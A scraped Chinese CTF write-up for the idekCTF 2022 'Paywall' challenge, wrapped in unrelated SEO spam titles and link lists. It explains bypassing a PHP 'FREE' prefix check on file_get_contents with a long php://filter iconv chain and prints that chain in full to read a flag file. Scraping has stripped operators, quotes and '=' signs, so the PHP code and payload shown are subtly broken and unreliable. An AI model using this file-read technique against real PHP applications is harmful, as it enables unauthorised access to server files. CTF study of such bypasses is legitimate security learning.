当前位置: 首页 > news >正文

企业宣传网站建设方案许昌市住房和城乡建设局网站

企业宣传网站建设方案,许昌市住房和城乡建设局网站,自己制作网页的步骤,公司网站排名[idekCTF 2022]Paywall 一、解题流程#xff08;一#xff09;、分析#xff08;二#xff09;、解题 二、思考总结 一、解题流程 #xff08;一#xff09;、分析 点击source可以看到源码#xff0c;其中关键部分#xff1a;if (isset($_GET[p])) {$article_content… [idekCTF 2022]Paywall 一、解题流程一、分析二、解题 二、思考总结 一、解题流程 一、分析 点击source可以看到源码其中关键部分if (isset($_GET[p])) {$article_content file_get_contents($_GET[p], 1);if (strpos($article_content, PREMIUM) 0) {die(Thank you for your interest in The idek Times, but this article is only for premium users!);}else if (strpos($article_content, FREE) 0) { //strpos查找目标字符串所在位置0就说明要在开头就出现echo article$article_content/article;die();}else {die(nothing here);} } 1、file_get_contents会读取文件内容这道题目实际上要读的文件名是flag 2、利用p传参并且内容必须以FREE开头strpos函数作用是获取目标字符串位置如果FREE在开头则pos是0。 3、又因为要以FREE开头所以普通伪协议没法写比如php://filter/readconvert.base64-encode/resourceFREE/flag   为了将FREE隐藏于无形中还要让他生效我们应该采用filter_chain的方式去绕过 二、解题 打开php_filter_chain_generator.py 输入py php_filter_chain_generator.py --chain “FREE”php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resourcephp://temp这里需要注意我们得到的filter_chain其结尾是**/resourcephp://temp** 这意味着什么1、目前文件很可能因为伪协议变成流进行传输导致内容失效或无法输出        2、目标文件不是temp是flag我们将结尾改为**/resourceflag**以后再次传输虽然输出了内容但是乱码 这意味着什么且看filter_chain中采用的字符集编码包括了convert.iconv.UTF8.UTF7 1、FREE - base64编码 - RlJFRQ - UTF8.UTF7 - RlJFRQ   少了等号而编码的内容都是必须完整的一旦少了所有内容都会受影响导致乱码 2、FREE-- - base64编码 - RlJFRS0t - UTF8.UTF7 - RlJFRS0t    所以我们填充一点字符进去输入py php_filter_chain_generator.py --chain “FREE–” 将payload输入得到flagidek{REDACTED} 二、思考总结 这道题目加强了对filter_chain工具使用的熟练度加深了对于编码完整性的理解以及哪种场景该用filter_chain去完成。
http://www.zqtcl.cn/news/891086/

相关文章:

  • 做网站客户需求新乡专业做网站多少钱
  • 邢台建设银行官方网站二维码生成器app下载
  • 自己怎么做网站游戏做网站就是做app
  • 怎样做一元购网站wordpress+淘客代码
  • 网站建设发展现状贵阳有哪些做网站的公司
  • 微博上如何做网站推广蝉知和wordpress
  • 泷澄建设集团网站北京建设执业资格注册网站
  • 门户网站建设情况报告深圳龙岗房价多少钱一平方米
  • 网站建设备案是什么ps培训班
  • 深圳网站推广优化wordpress 运行速度慢
  • 谁能给个网站谢谢发布广东建设工程信息网站
  • 网站建设用户需求分析中国加盟网
  • 建设上线网站seo关键词优化软件排名
  • 郑州手工网站建设公司企业做网站好做吗
  • 苏华建设集团网站产品营销网站
  • 郑州专业做网站的网站收录最好的方法
  • 微信小程序网站建设哪家好视频教学网站开发
  • 个人网站排行网站集约化后如何建设
  • 企业网站维护wordpress特效代码
  • 建设银行网站短信错误6次wordpress新主题去版权
  • 国外 配色网站天猫店购买交易平台
  • 网站推广广告词大全集网站和网络建设自查报告
  • 电子商务网站建设备案须知自己做的网站服务器在哪里
  • 怎样用wordpress做网站wordpress 首页判断
  • jsp做的网站效果织梦网站程序模板
  • 展示型网站设计公司网盘wordpress
  • 网站建设 保密学服装设计后悔了
  • 网站建设前端和后端网站开发所遵循的
  • 有自己域名的个人网站企业网站建设制作公司
  • 工程行业网站优化网站推广排名